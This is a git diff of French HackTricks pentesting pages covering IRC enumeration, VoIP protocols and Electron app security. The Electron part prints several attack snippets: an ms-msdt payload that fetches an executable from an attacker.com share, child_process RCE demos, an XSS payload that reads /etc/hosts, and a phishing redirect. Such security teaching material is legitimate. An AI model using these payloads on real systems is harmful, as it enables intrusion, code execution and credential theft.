* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,7 +30,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Informations de base
IRC, initialement un protocole **en texte clair**, a été assigné **194/TCP** par l'IANA mais est généralement exécuté sur **6667/TCP** et des ports similaires pour éviter d'avoir besoin de **privilèges root** pour fonctionner.
IRC, initialement un protocole **texte brut**, a été assigné **194/TCP** par l'IANA mais est généralement exécuté sur **6667/TCP** et des ports similaires pour éviter d'avoir besoin de **privilèges root** pour fonctionner.
Un **pseudo** est tout ce dont vous avez besoin pour vous connecter à un serveur. Après la connexion, le serveur effectue une recherche DNS inverse sur l'IP de l'utilisateur.
@ -52,7 +52,7 @@ openssl s_client -connect <IP>:<PORT> -quiet
```
### Manuel
Ici, vous pouvez voir comment vous connecter et accéder à l'IRC en utilisant un **pseudo aléatoire** puis énumérer des informations intéressantes. Vous pouvez en apprendre davantage sur les commandes de l'IRC [ici](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
Ici, vous pouvez voir comment vous connecter et accéder à l'IRC en utilisant un **pseudo aléatoire** puis énumérer quelques informations intéressantes. Vous pouvez en apprendre davantage sur les commandes de l'IRC [ici](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP).
```bash
#Connection with random nickname
USER ran213eqdw123 0 * ran213eqdw123
@ -98,9 +98,9 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
* `recherche de votre nom d'hôte`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert AWS Red Team de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -42,8 +42,8 @@ Il s'agit de la norme de l'industrie, pour plus d'informations, consultez :
MGCP (Media Gateway Control Protocol) est un **protocole de signalisation** et de **contrôle d'appel** décrit dans la RFC 3435. Il fonctionne dans une architecture centralisée, qui se compose de trois composants principaux :
1. **Agent d'appel ou contrôleur de passerelle multimédia (MGC)** : La passerelle maître dans l'architecture MGCP est responsable de **la gestion et du contrôle des passerelles multimédias**. Il gère les processus de configuration, de modification et de terminaison des appels. Le MGC communique avec les passerelles multimédias en utilisant le protocole MGCP.
2. **Passerelles multimédias (MG) ou passerelles esclaves** : Ces appareils **convertissent les flux multimédias numériques entre différents réseaux**, tels que la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets. Ils sont gérés par le MGC et exécutent les commandes reçues de celui-ci. Les passerelles multimédias peuvent inclure des fonctions telles que le transcodage, la mise en paquets et l'annulation d'écho.
1. **Agent d'appel ou Contrôleur de passerelle multimédia (MGC)** : La passerelle maître dans l'architecture MGCP est responsable de **la gestion et du contrôle des passerelles multimédias**. Elle gère les processus de configuration, de modification et de terminaison des appels. Le MGC communique avec les passerelles multimédias en utilisant le protocole MGCP.
2. **Passerelles multimédias (MG) ou Passerelles esclaves** : Ces appareils **convertissent les flux multimédias numériques entre différents réseaux**, tels que la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets. Ils sont gérés par le MGC et exécutent les commandes reçues de celui-ci. Les passerelles multimédias peuvent inclure des fonctions telles que le transcodage, la mise en paquets et l'annulation d'écho.
3. **Passerelles de signalisation (SG)** : Ces passerelles sont responsables de **la conversion des messages de signalisation entre différents réseaux**, permettant une communication transparente entre les systèmes de téléphonie traditionnels (par ex., SS7) et les réseaux basés sur IP (par ex., SIP ou H.323). Les passerelles de signalisation sont cruciales pour l'interopérabilité et garantissent que les informations de contrôle d'appel sont correctement communiquées entre les différents réseaux.
En résumé, le MGCP centralise la logique de contrôle d'appel dans l'agent d'appel, ce qui simplifie la gestion des passerelles multimédias et de signalisation, offrant une meilleure évolutivité, fiabilité et efficacité dans les réseaux de télécommunication.
@ -66,11 +66,11 @@ SCCP offre une méthode de communication simple et efficace entre les serveurs d
H.323 est un **ensemble de protocoles** pour la communication multimédia, comprenant la voix, la vidéo et la conférence de données sur des réseaux commutés par paquets, tels que les réseaux basés sur IP. Il a été développé par l'**Union internationale des télécommunications** (UIT-T) et fournit un cadre complet pour la gestion des sessions de communication multimédia.
Certains composants clés de l'ensemble H.323 comprennent :
Certains composants clés de la suite H.323 comprennent :
1. **Terminaux** : Ce sont des dispositifs terminaux, tels que des téléphones IP, des systèmes de visioconférence ou des applications logicielles, qui prennent en charge H.323 et peuvent participer à des sessions de communication multimédia.
1. **Terminaux** : Il s'agit de dispositifs terminaux, tels que les téléphones IP, les systèmes de visioconférence ou les applications logicielles, qui prennent en charge H.323 et peuvent participer à des sessions de communication multimédia.
2. **Passerelles** : Ces dispositifs convertissent les flux multimédias entre différents réseaux, comme la téléphonie commutée traditionnelle et les réseaux IP commutés par paquets, permettant l'interopérabilité entre H.323 et d'autres systèmes de communication. Ils peuvent également inclure des fonctionnalités supplémentaires, telles que le transcodage ou l'annulation d'écho.
3. **Contrôleurs de passerelle** : Ce sont des composants facultatifs qui fournissent des services de contrôle et de gestion d'appels dans un réseau H.323. Ils effectuent des fonctions telles que la traduction d'adresses, la gestion de la bande passante et le contrôle d'admission, aidant à gérer et optimiser les ressources réseau.
3. **Contrôleurs de passerelle** : Il s'agit de composants facultatifs qui fournissent des services de contrôle et de gestion d'appels dans un réseau H.323. Ils effectuent des fonctions telles que la traduction d'adresses, la gestion de la bande passante et le contrôle d'admission, aidant à gérer et à optimiser les ressources réseau.
4. **Unités de contrôle multipoint (MCU)** : Ces dispositifs facilitent les conférences multipoint en gérant et en mélangeant les flux multimédias de plusieurs terminaux. Les MCU permettent des fonctionnalités telles que le contrôle de la disposition vidéo, la commutation activée par la voix et la présence continue, permettant d'organiser des conférences à grande échelle avec plusieurs participants.
H.323 prend en charge une gamme de codecs audio et vidéo, ainsi que d'autres services supplémentaires comme le renvoi d'appel, le transfert d'appel, la mise en attente et l'attente d'appel. Malgré son adoption généralisée au début de la VoIP, H.323 a été progressivement remplacé par des protocoles plus modernes et flexibles comme le **protocole d'initiation de session (SIP)**, qui offre une meilleure interopérabilité et une mise en œuvre plus facile. Cependant, H.323 reste utilisé dans de nombreux systèmes hérités et continue d'être pris en charge par divers fournisseurs d'équipements.
@ -84,7 +84,7 @@ IAX est connu pour sa **simplicité, son efficacité et sa facilité de mise en
1. **Port UDP unique** : IAX utilise un seul port UDP (4569) pour le trafic de signalisation et de média, ce qui simplifie le traversée des pare-feu et des NAT, facilitant le déploiement dans divers environnements réseau.
2. **Protocole binaire** : Contrairement aux protocoles basés sur du texte comme SIP, IAX est un protocole binaire, ce qui réduit sa consommation de bande passante et le rend plus efficace pour la transmission de données de signalisation et de média.
3. **Troncage** : IAX prend en charge le troncage, ce qui permet de combiner plusieurs appels en une seule connexion réseau, réduisant les frais généraux et améliorant l'utilisation de la bande passante.
4. **Cryptage natif** : IAX prend en charge le cryptage intégré, en utilisant des méthodes comme RSA pour l'échange de clés et AES pour le cryptage des médias, assurant une communication sécurisée entre les points d'extrémité.
4. **Chiffrement natif** : IAX prend en charge le chiffrement intégré, en utilisant des méthodes comme RSA pour l'échange de clés et AES pour le chiffrement des médias, assurant une communication sécurisée entre les points d'extrémité.
5. **Communication peer-to-peer** : IAX peut être utilisé pour une communication directe entre les points d'extrémité sans nécessiter de serveur central, permettant un routage d'appel plus simple et plus efficace.
Malgré ses avantages, IAX présente certaines limitations, telles que son accent principal sur l'écosystème Asterisk et une adoption moins répandue par rapport à des protocoles plus établis comme SIP. En conséquence, IAX pourrait ne pas être le meilleur choix pour l'interopérabilité avec des systèmes ou des dispositifs non-Asterisk. Cependant, pour ceux travaillant dans l'environnement Asterisk, IAX offre une solution robuste et efficace pour la communication VoIP.
@ -92,29 +92,29 @@ Malgré ses avantages, IAX présente certaines limitations, telles que son accen
### SDP (Session Description Protocol)
SDP (Session Description Protocol) est un **format basé sur du texte** utilisé pour décrire les caractéristiques des sessions multimédias, telles que la voix, la vidéo ou la conférence de données, sur les réseaux IP. Il a été développé par le **Groupe de travail d'ingénierie de l'Internet (IETF)** et est défini dans le **RFC 4566**. SDP ne gère pas la transmission réelle des médias ou l'établissement de session, mais est utilisé en conjonction avec d'autres protocoles de signalisation, comme **SIP (Session Initiation Protocol)**, pour négocier et échanger des informations sur les flux multimédias et leurs attributs.
SDP (Session Description Protocol) est un **format basé sur du texte** utilisé pour décrire les caractéristiques des sessions multimédias, telles que la voix, la vidéo ou la conférence de données, sur les réseaux IP. Il a été développé par le **Groupe de travail d'ingénierie de l'Internet (IETF)** et est défini dans le **RFC 4566**. SDP ne gère pas la transmission réelle des médias ou l'établissement de session, mais est utilisé en conjonction avec d'autres protocoles de signalisation, comme **SIP (Session Initiation Protocol)**, pour négocier et échanger des informations sur les flux médias et leurs attributs.
Certains éléments clés de SDP comprennent :
1. **Informations sur la session** : SDP décrit les détails d'une session multimédia, y compris le nom de la session, la description de la session, l'heure de début et l'heure de fin.
2. **Flux multimédias** : SDP définit les caractéristiques des flux multimédias, tels que le type de média (audio, vidéo ou texte), le protocole de transport (par exemple, RTP ou SRTP), et le format du média (par exemple, les informations sur le codec).
2. **Flux médias** : SDP définit les caractéristiques des flux médias, tels que le type de média (audio, vidéo ou texte), le protocole de transport (par exemple, RTP ou SRTP) et le format média (par exemple, informations sur le codec).
3. **Informations de connexion** : SDP fournit des informations sur l'adresse réseau (adresse IP) et le numéro de port où les médias doivent être envoyés ou reçus.
4. **Attributs** : SDP prend en charge l'utilisation d'attributs pour fournir des informations supplémentaires et facultatives sur une session ou un flux multimédia. Les attributs peuvent être utilisés pour spécifier diverses fonctionnalités telles que les clés de chiffrement, les exigences de bande passante ou les mécanismes de contrôle des médias.
4. **Attributs** : SDP prend en charge l'utilisation d'attributs pour fournir des informations supplémentaires facultatives sur une session ou un flux média. Les attributs peuvent être utilisés pour spécifier diverses fonctionnalités telles que les clés de chiffrement, les exigences de bande passante ou les mécanismes de contrôle des médias.
SDP est généralement utilisé dans le processus suivant :
1. Une partie initiatrice crée une description SDP de la session multimédia proposée, y compris les détails des flux multimédias et de leurs attributs.
1. Une partie initiatrice crée une description SDP de la session multimédia proposée, y compris les détails des flux médias et de leurs attributs.
2. La description SDP est envoyée à la partie réceptrice, généralement intégrée dans un message de protocole de signalisation comme SIP ou RTSP.
3. La partie réceptrice traite la description SDP, et en fonction de ses capacités, elle peut accepter, rejeter ou modifier la session proposée.
4. La description SDP finale est renvoyée à la partie initiatrice dans le cadre du message de protocole de signalisation, complétant ainsi le processus de négociation.
4. La description SDP finale est renvoyée à la partie initiatrice dans le cadre du message de protocole de signalisation, complétant le processus de négociation.
La simplicité et la flexibilité de SDP en font une norme largement adoptée pour décrire des sessions multimédias dans divers systèmes de communication, jouant un rôle crucial dans l'établissement et la gestion de sessions multimédias en temps réel sur les réseaux IP.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (Real-time Transport Protocol)** : RTP est un protocole réseau conçu pour la livraison de données audio et vidéo, ou d'autres médias en temps réel, sur les réseaux IP. Développé par l'**IETF** et défini dans le **RFC 3550**, RTP est couramment utilisé avec des protocoles de signalisation comme SIP et H.323 pour permettre la communication multimédia. RTP fournit des mécanismes de **synchronisation**, de **séquençage** et de **horodatage** des flux multimédias, contribuant à assurer une lecture fluide et opportune des médias.
2. **RTCP (Real-time Transport Control Protocol)** : RTCP est un protocole compagnon de RTP, utilisé pour surveiller la qualité de service (QoS) et fournir des retours sur la transmission des flux multimédias. Défini dans le même **RFC 3550** que RTP, RTCP **échange périodiquement des paquets de contrôle entre les participants d'une session RTP**. Il partage des informations telles que la perte de paquets, le jitter et le temps de propagation, ce qui aide à diagnostiquer et à s'adapter aux conditions du réseau, améliorant ainsi la qualité globale des médias.
3. **SRTP (Secure Real-time Transport Protocol)** : SRTP est une extension de RTP qui fournit **le chiffrement**, **l'authentification des messages** et **la protection contre les rejeux** pour les flux multimédias, assurant une transmission sécurisée des données audio et vidéo sensibles. Défini dans le **RFC 3711**, SRTP utilise des algorithmes cryptographiques comme AES pour le chiffrement et HMAC-SHA1 pour l'authentification des messages. SRTP est souvent utilisé en combinaison avec des protocoles de signalisation sécurisés comme SIP sur TLS pour fournir une sécurité de bout en bout dans la communication multimédia.
4. **ZRTP (Zimmermann Real-time Transport Protocol)** : ZRTP est un protocole d'accord de clé cryptographique qui fournit **le chiffrement de bout en bout** pour les flux multimédias RTP. Développé par Phil Zimmermann, le créateur de PGP, ZRTP est décrit dans le **RFC 6189**. Contrairement à SRTP, qui repose sur des protocoles de signalisation pour l'échange de clés, ZRTP est conçu pour fonctionner indépendamment du protocole de signalisation. Il utilise **l'échange de clés Diffie-Hellman** pour établir un secret partagé entre les parties communicantes, sans nécessiter de confiance préalable ou d'infrastructure de clés publiques (PKI). ZRTP inclut également des fonctionnalités telles que les **Chaînes d'authentification courtes (SAS)** pour se protéger contre les attaques de l'homme du milieu.
1. **RTP (Real-time Transport Protocol)** : RTP est un protocole réseau conçu pour la livraison de données audio et vidéo, ou d'autres médias en temps réel, sur les réseaux IP. Développé par l'**IETF** et défini dans le **RFC 3550**, RTP est couramment utilisé avec des protocoles de signalisation comme SIP et H.323 pour permettre la communication multimédia. RTP fournit des mécanismes de **synchronisation**, de **séquençage** et d'**horodatage** des flux médias, contribuant à assurer une lecture fluide et opportune des médias.
2. **RTCP (Real-time Transport Control Protocol)** : RTCP est un protocole compagnon de RTP, utilisé pour surveiller la qualité de service (QoS) et fournir des retours sur la transmission des flux médias. Défini dans le même **RFC 3550** que RTP, RTCP **échange périodiquement des paquets de contrôle entre les participants à une session RTP**. Il partage des informations telles que la perte de paquets, le jitter et le temps de propagation, ce qui aide à diagnostiquer et à s'adapter aux conditions du réseau, améliorant ainsi la qualité globale des médias.
3. **SRTP (Secure Real-time Transport Protocol)** : SRTP est une extension de RTP qui fournit **le chiffrement**, **l'authentification des messages** et **la protection contre les rejeux** pour les flux médias, assurant une transmission sécurisée des données audio et vidéo sensibles. Défini dans le **RFC 3711**, SRTP utilise des algorithmes cryptographiques comme AES pour le chiffrement et HMAC-SHA1 pour l'authentification des messages. SRTP est souvent utilisé en combinaison avec des protocoles de signalisation sécurisés comme SIP sur TLS pour fournir une sécurité de bout en bout dans la communication multimédia.
4. **ZRTP (Zimmermann Real-time Transport Protocol)** : ZRTP est un protocole d'accord de clé cryptographique qui fournit **le chiffrement de bout en bout** pour les flux médias RTP. Développé par Phil Zimmermann, le créateur de PGP, ZRTP est décrit dans le **RFC 6189**. Contrairement à SRTP, qui repose sur des protocoles de signalisation pour l'échange de clés, ZRTP est conçu pour fonctionner indépendamment du protocole de signalisation. Il utilise **l'échange de clés Diffie-Hellman** pour établir un secret partagé entre les parties communicantes, sans nécessiter de confiance préalable ou d'infrastructure de clés publiques (PKI). ZRTP inclut également des fonctionnalités telles que les **Chaînes d'authentification courtes (SAS)** pour se protéger contre les attaques de l'homme du milieu.
Ces protocoles jouent des rôles essentiels dans **la livraison et la sécurisation de la communication multimédia en temps réel sur les réseaux IP**. Alors que RTP et RTCP gèrent la transmission réelle des médias et la surveillance de la qualité, SRTP et ZRTP veillent à ce que les médias transmis soient protégés contre l'écoute, la manipulation et les attaques de rejeu.

View file

@ -6,17 +6,17 @@
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -58,14 +58,14 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
Les paramètres du **processus de rendu** peuvent être **configurés** dans le **processus principal** à l'intérieur du fichier main.js. Certaines configurations **empêcheront l'application Electron de subir une RCE** ou d'autres vulnérabilités si les **paramètres sont correctement configurés**.
Les paramètres du **processus de rendu** peuvent être **configurés** dans le **processus principal** à l'intérieur du fichier main.js. Certaines configurations permettront d'**éviter que l'application Electron ne soit victime d'une RCE** ou d'autres vulnérabilités si les **paramètres sont correctement configurés**.
L'application Electron **pourrait accéder au périphérique** via les API Node bien qu'il puisse être configuré pour l'empêcher :
* **`nodeIntegration`** - est `désactivé` par défaut. S'il est activé, permet d'accéder aux fonctionnalités de Node depuis le processus de rendu.
* **`contextIsolation`** - est `activé` par défaut. S'il est désactivé, les processus principal et de rendu ne sont pas isolés.
* **`nodeIntegration`** - est `désactivé` par défaut. S'il est activé, cela permet d'accéder aux fonctionnalités de Node depuis le processus de rendu.
* **`contextIsolation`** - est activé par défaut. S'il est désactivé, les processus principal et de rendu ne sont pas isolés.
* **`preload`** - vide par défaut.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - est désactivé par défaut. Il restreindra les actions que NodeJS peut effectuer.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - est désactivé par défaut. Cela restreindra les actions que NodeJS peut effectuer.
* Intégration de Node dans les Workers
* **`nodeIntegrationInSubframes`** - est `désactivé` par défaut.
* Si **`nodeIntegration`** est **activé**, cela permettrait l'utilisation des **API Node.js** dans les pages web qui sont **chargées dans des iframes** au sein d'une application Electron.
@ -115,7 +115,7 @@ Modifier la configuration start-main et ajouter l'utilisation d'un proxy tel que
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Injection de Code Local dans Electron
## Injection de Code Local Electron
Si vous pouvez exécuter localement une application Electron, il est possible que vous puissiez lui faire exécuter du code JavaScript arbitraire. Vérifiez comment faire dans:
@ -137,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
Le script indiqué dans ce paramètre est **chargé avant les autres scripts dans le moteur de rendu**, il a donc un **accès illimité aux API Node**:
Le script indiqué dans ce paramètre est **chargé avant les autres scripts dans le moteur de rendu**, il a donc un **accès illimité aux APIs Node**:
```javascript
new BrowserWindow{
webPreferences: {
@ -174,12 +174,12 @@ runCalc();
## RCE: XSS + contextIsolation
Le _**contextIsolation**_ introduit les **contextes séparés entre les scripts de la page web et le code interne JavaScript d'Electron** de sorte que l'exécution JavaScript de chaque code n'affecte pas les autres. Il s'agit d'une fonctionnalité nécessaire pour éliminer la possibilité de RCE.
La _**contextIsolation**_ introduit les **contextes séparés entre les scripts de la page web et le code interne JavaScript d'Electron** de sorte que l'exécution JavaScript de chaque code n'affecte pas l'autre. Il s'agit d'une fonctionnalité nécessaire pour éliminer la possibilité de RCE.
Si les contextes ne sont pas isolés, un attaquant peut :
1. Exécuter du **JavaScript arbitraire dans le renderer** (XSS ou navigation vers des sites externes)
2. **Écraser la méthode intégrée** qui est utilisée dans le preload ou le code interne d'Electron par sa propre fonction
2. **Écraser la méthode intégrée** utilisée dans le preload ou le code interne d'Electron par sa propre fonction
3. **Déclencher** l'utilisation de la **fonction écrasée**
4. RCE ?
@ -207,7 +207,7 @@ window.addEventListener('click', (e) => {
Pour plus d'informations sur ces exemples, consultez [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) et [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
Lors du déploiement d'une application de bureau Electron, il est crucial de garantir les paramètres corrects pour `nodeIntegration` et `contextIsolation`. Il est établi que l'exécution de code à distance côté client (RCE) ciblant les scripts de préchargement ou le code natif d'Electron depuis le processus principal est efficacement empêchée avec ces paramètres en place.
Lors du déploiement d'une application de bureau Electron, il est crucial de garantir les paramètres corrects pour `nodeIntegration` et `contextIsolation`. Il est établi que l'exécution de code à distance côté client (RCE) ciblant les scripts de préchargement ou le code natif d'Electron à partir du processus principal est efficacement empêchée avec ces paramètres en place.
Lorsqu'un utilisateur interagit avec des liens ou ouvre de nouvelles fenêtres, des écouteurs d'événements spécifiques sont déclenchés, ce qui est crucial pour la sécurité et la fonctionnalité de l'application:
```javascript
@ -222,9 +222,9 @@ Ces écouteurs sont **remplacés par l'application de bureau** pour implémenter
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Les meilleures pratiques de sécurité d'Electron JS déconseillent d'accepter du contenu non fiable avec la fonction `openExternal`, car cela pourrait entraîner une RCE via divers protocoles. Les systèmes d'exploitation prennent en charge différents protocoles qui pourraient déclencher une RCE. Pour des exemples détaillés et une explication approfondie sur ce sujet, vous pouvez consulter [cette ressource](https://positive.security/blog/url-open-rce#windows-10-19042), qui inclut des exemples de protocoles Windows capables d'exploiter cette vulnérabilité.
Les meilleures pratiques de sécurité d'Electron JS déconseillent d'accepter du contenu non fiable avec la fonction `openExternal`, car cela pourrait entraîner une exécution de code à distance via divers protocoles. Les systèmes d'exploitation prennent en charge différents protocoles qui pourraient déclencher une exécution de code à distance. Pour des exemples détaillés et une explication approfondie sur ce sujet, vous pouvez consulter [cette ressource](https://positive.security/blog/url-open-rce#windows-10-19042), qui inclut des exemples de protocoles Windows capables d'exploiter cette vulnérabilité.
**Exemples d'exploitations de protocoles Windows :**
**Les exemples d'exploitations de protocoles Windows incluent :**
```html
<script>
window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
@ -258,9 +258,9 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
Si le **chromium** utilisé par l'application est **ancien** et qu'il présente des **vulnérabilités connues**, il pourrait être possible de **l'exploiter et d'obtenir une RCE via un XSS**.\
Vous pouvez voir un exemple dans ce **writeup**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **Phishing XSS via contournement regex d'URL interne**
## **Phishing XSS via Contournement de regex d'URL interne**
Supposons que vous ayez trouvé un XSS mais que vous **ne pouvez pas déclencher de RCE ou voler des fichiers internes**, vous pourriez essayer de l'utiliser pour **voler des identifiants via le phishing**.
Supposons que vous ayez trouvé un XSS mais que vous **ne pouvez pas déclencher de RCE ou voler des fichiers internes**, vous pourriez essayer de l'utiliser pour **voler des informations d'identification via du phishing**.
Tout d'abord, vous devez savoir ce qui se passe lorsque vous essayez d'ouvrir une nouvelle URL, en vérifiant le code JS dans le front-end:
```javascript
@ -269,7 +269,7 @@ webContents.on("will-navigate", function (event, url) {} // o
```
La fonction **`openInternally`** décidera si le **lien** sera **ouvert** dans la **fenêtre de bureau** car il s'agit d'un lien appartenant à la plateforme, **ou** s'il sera ouvert dans le **navigateur en tant que ressource tierce**.
Dans le cas où le **regex** utilisé par la fonction est **vulnérable aux contournements** (par exemple en **ne faisant pas d'échappement des points des sous-domaines**), un attaquant pourrait exploiter la XSS pour **ouvrir une nouvelle fenêtre qui** sera située dans l'infrastructure de l'attaquant **demandant des informations d'identification** à l'utilisateur:
Dans le cas où le **regex** utilisé par la fonction est **vulnérable aux contournements** (par exemple en **ne protégeant pas les points des sous-domaines**), un attaquant pourrait exploiter la XSS pour **ouvrir une nouvelle fenêtre qui** sera située dans l'infrastructure de l'attaquant **demandant des informations d'identification** à l'utilisateur:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -286,7 +286,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
Dans [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s), vous pouvez trouver un laboratoire pour exploiter des applications Electron vulnérables.
Quelques commandes qui vous aideront avec le laboratoire:
Quelques commandes qui vous aideront dans le laboratoire:
```bash
# Download apps from these URls
# Vuln to nodeIntegration
@ -319,15 +319,15 @@ npm start
* Plus de recherches et d'articles sur la sécurité d'Electron sur [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site web et essayer leur moteur gratuitement sur :
{% embed url="https://whiteintel.io" %}
@ -337,7 +337,7 @@ Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
